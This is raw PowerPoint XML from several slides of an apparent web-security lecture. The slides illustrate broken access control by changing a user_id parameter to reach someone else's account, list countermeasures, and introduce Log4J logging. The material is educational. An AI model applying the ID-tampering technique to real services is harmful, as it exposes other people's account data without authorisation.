      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E6A3FB1-7FE0-AF85-B6A2-65B994077038}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="534197" y="4893708"/>
            <a:ext cx="3857146" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GET /user/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>profile?user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=123</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GET /user/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>profile?user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=124</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF0E79C8-F2EB-4EF5-7E8A-3E6B2B17C17F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4391343" y="4882341"/>
            <a:ext cx="1390124" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>My Account</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F61AA008-EB05-A66D-9A18-A8BE0EA5A73B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4391343" y="5447706"/>
            <a:ext cx="2749471" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Someone Else’s Account</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C5EF2EE-BD00-1518-6117-60BB932E4C9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8382000" y="4097511"/>
            <a:ext cx="3200400" cy="2585323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Countermeasures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Except for public resources, deny by default</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implement secure Cross-Origin-Resource-Sharing (CORS) policies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Log Access Control Failures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6146" name="Picture 2" descr="3 Raccoons in a Trench Coat">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27D9E660-2E20-A71A-906A-57A05E6D5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86435"/>
            <a:ext cx="20859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5248086-5C31-EA43-BF0E-38127199E829}"/>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B11E6174-FE2B-D5E8-EF3A-1E2144A1341D}"/>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1761E773-06A0-6FB3-4468-9EE9164C1921}"/>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E2B83F0C-D333-02DC-47BB-990FC083D204}"/>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61A3E015-1A59-6247-0969-BD362F7966C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AB7C55A-AC68-809D-46F8-36C94A5F2F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0F6264EA-DBCC-AB50-DF9A-1CC1E3041E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69303F8D-A279-17CD-C72F-3BECC2E183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9010D31D-7E12-7D71-079B-3702BDEDFE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526A81F3-FAAA-18CA-141F-CEBA6B28D5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40A70A1-0285-C9F7-296D-4927D595F794}"/>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312D9D-1542-0E20-DFDD-59E64DD9522C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7886700" y="4953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4340089D-7127-5B1B-7E46-151F2E157B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5D6FE098-BC4F-1A77-0230-2C7F0566E22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C1ADC150-AAEB-317D-F524-6A145E52286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56A88E8D-7D05-F9A8-927A-31BCAFD8DBA5}"/>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C08D6F4-4EA7-E0F7-BD43-B0D3E6D76E65}"/>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89B1CAEC-A1D8-BA21-62BF-ED4DDBFAB171}"/>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E03F57D4-A331-E4AC-B3B7-917169915E7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10802374" y="151219"/>
            <a:ext cx="659155" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>JVM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="427750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475F23A-F78A-33F5-33CA-2853CD46F73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9F9DB845-997D-4BCB-D701-97F47A77442E}"/>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B6FF0CF8-561F-54DB-5B36-3FE88CCEC85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87B43DD1-DECD-1DA2-4AA1-A9D6E883F7E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D2DF5C0B-6A43-B8BE-D715-58C18565D58F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{157CD09C-0CCF-34B7-0A9A-E539AB8672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18153E4C-8555-4EF7-0C40-9B81695E31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3EA297B7-C1F2-813F-0900-B1C381EF0E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C756A39F-645B-3C50-165C-639D310094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E80AA453-5935-F62C-A3CE-F8C35572BD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0BB4C16-4FA9-9C17-1E4C-9C19148A5F6B}"/>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23B3CF-13C0-B97B-71F2-1260FC01D566}"/>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4E638775-CA89-06B2-3A57-7C398C844E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8B21219A-5A21-91E9-6365-EACCCB1DF4C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E82291E4-A6ED-1B64-24D4-CC73D3D4C9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04981D45-036B-E29D-B4E9-765A69551E89}"/>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59D3D5-BE23-AAE9-2A98-54D6510C3B59}"/>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290EE31F-4A87-8007-BE6F-BC852D3DCDF7}"/>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464FF647-8E81-7ADC-9EB0-FC60E3C43420}"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{973F5945-FFC5-95AF-3412-1DC75B5E0938}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368957" y="4943963"/>
            <a:ext cx="6702476" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Messages sent on server are stored in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> file</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C97FB80-139B-EC4C-2532-90A24103E318}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="298425" y="5526830"/>
            <a:ext cx="6773008" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The most common Java logging library is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Log4J</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="Picture 2" descr="Log4j - Wikipedia">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B176ADD0-B727-3B3E-7BDE-2C26D579810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63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B4508C-14AE-C00B-C092-841EA606EDE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64A7E60-DBD8-4320-6A90-3ABBBB61FC83}"/>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247A6ACE-C30F-1355-9A66-A5AEDFD34F07}"/>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CCEDC5DE-9043-61A6-03A1-22D02574386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DD5FB021-211E-602E-866D-74F514F18FDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44756F7C-1EB5-62D6-D3C3-3BD93D23CF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2AB4E3DB-BC55-55E8-5696-60178F3D96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6070973A-0E4B-1130-157F-34369115AB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CC5B53EB-A1F0-373F-DF55-A11E4C2B9C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091692D4-A864-A662-A70D-7B9F478C4B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DB7363D-E994-40C1-085D-DE5A947629AE}"/>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B389DB-11F5-679D-B837-57B65B6A1A18}"/>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553758D5-B9CF-173E-739C-23ED188DC1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F166B9C3-DF0B-DE5A-25E7-B9A46456A9E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F2668C45-2AEB-26AA-7A3D-3E4E35862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E6074911-0773-7CA8-0F84-2584919C6A6F}"/>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CB019B4-E8D8-4B5C-8E89-0E3F47897142}"/>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FFCA2F81-CBF9-9D79-335D-1A406E6FDEB6}"/>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C784EC79-C9C5-6663-89A9-46CF72364F22}"/>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0CC667ED-0EEA-1836-B664-C1693D1EDE4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F9435FE-7EB9-331D-0A53-BB406B692B3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="4529111"/>
            <a:ext cx="8743950" cy="590695"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A79243B-15E2-A299-B8EF-A5A42FE1025F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3012569" y="5470789"/>
            <a:ext cx="3518912" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Very similar to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fstrings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in Python </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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E6224DF2-94EA-F381-FCE6-A38C119891D0}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5536980" y="4995615"/>
              <a:ext cx="1235520" cy="215280"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="21" name="Ink 20">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6224DF2-94EA-F381-FCE6-A38C119891D0}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId11"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5527980" y="4986615"/>
                <a:ext cx="12531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981ECC76-6DB4-DDE9-DDB7-DC2A343AD137}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2950740" y="2505855"/>
              <a:ext cx="117720" cy="115920"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="25" name="Ink 24">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{981ECC76-6DB4-DDE9-DDB7-DC2A343AD137}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId13"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="2914740" y="2470215"/>
                <a:ext cx="18936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43F43956-1C35-5CB7-CE0F-14CA37193B57}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3067020" y="2551215"/>
              <a:ext cx="6117480" cy="2477160"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="26" name="Ink 25">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43F43956-1C35-5CB7-CE0F-14CA37193B57}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId15"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="3031020" y="2515575"/>
                <a:ext cx="6189120" cy="2548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82BC715-EF1D-278B-FD6C-3E355822FD0C}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="504540" y="4638135"/>
              <a:ext cx="3515400" cy="720"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="28" name="Ink 27">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{382BC715-EF1D-278B-FD6C-3E355822FD0C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId17"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="468540" y="4566135"/>
                <a:ext cx="3587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0864A300-B2F9-7C97-3BD4-6DF6C274DFFA}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="490860" y="4657575"/>
              <a:ext cx="23400" cy="345600"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="29" name="Ink 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0864A300-B2F9-7C97-3BD4-6DF6C274DFFA}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId19"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="455220" y="4621575"/>
                <a:ext cx="95040" cy="417240"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24802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A6778C1-543E-2F69-D53F-39DE303F554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817A7E81-D60C-933B-B34E-BFC86DFDAC25}"/>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8E1C0A35-F051-27D6-1479-658457E37D4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5970A3A3-4168-4184-C334-3D09656F50B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9B1C9463-CEC5-9648-D811-C07CD73071B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79B78287-F1FE-5959-A305-2467EAFD0D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469595B5-3093-022F-6987-A15923728E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76B5B140-31AA-2891-147A-CE73A76EA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C18D6820-E451-B4DF-78DB-25EC0EF24E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A27DCE84-923F-8129-0E4F-6C43838A81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793B123-6F78-7B39-6D2B-1B2B22F376BA}"/>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96B8CB-B3E8-B021-C5B4-FF65D0D555FC}"/>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C9C51C78-4025-8B20-20E1-02681CB449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D43593D2-99DE-864C-F732-006BB2C71FE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214A0C6D-3B1C-816B-5E4F-7C3F2BD9E02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622A95A5-43EC-0095-E8CB-20B9E36CFF3C}"/>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C76A1C-B2E9-F26B-1E5B-754AA3B46030}"/>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10ABB09A-EC51-3D26-0CA2-4C0DAFFA4AD2}"/>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8E47A6E6-C0C4-5AF8-58F5-6F38B8BE063A}"/>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9B779C74-DD7A-6432-A2D9-E21747919BD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D4F541A4-1103-DBD5-09EF-57E25DA744CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="4529111"/>
            <a:ext cx="8743950" cy="590695"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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1C2C3479-8BC0-FD3B-7F59-3816C6C1C7BF}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5536980" y="4995615"/>
              <a:ext cx="1235520" cy="215280"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="21" name="Ink 20">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C2C3479-8BC0-FD3B-7F59-3816C6C1C7BF}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId11"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5527980" y="4986615"/>
                <a:ext cx="12531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B56255F5-B7D3-014E-E597-00DD62AAE62A}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2950740" y="2505855"/>
              <a:ext cx="117720" cy="115920"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="25" name="Ink 24">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B56255F5-B7D3-014E-E597-00DD62AAE62A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId13"/>
              <a:stretch>
